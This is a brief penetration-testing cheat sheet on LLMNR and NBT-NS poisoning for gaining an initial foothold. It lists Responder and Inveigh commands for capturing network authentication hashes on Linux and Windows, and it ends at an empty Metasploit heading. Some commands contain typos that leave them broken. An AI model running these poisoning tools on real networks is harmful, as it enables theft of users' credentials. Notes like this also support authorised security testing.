# initial-foothold

\#llmnr #nbt-ns #capture

## LLMNR & NBT-NS poisoning

**Responder (linux)**

```
sudo responder -I ens224 -wfF -v
```

**Inveigh (Windows)**

> Inveigh <https://github.com/Kevin-Robertson/Inveigh>&#x20;

```
Import module .\Inveight.ps1
```

```
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
```

```
Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
```

* Inveight.exe (C# compile version)&#x20;
  * Press ESC
  * Type HELP

**Metasploit**
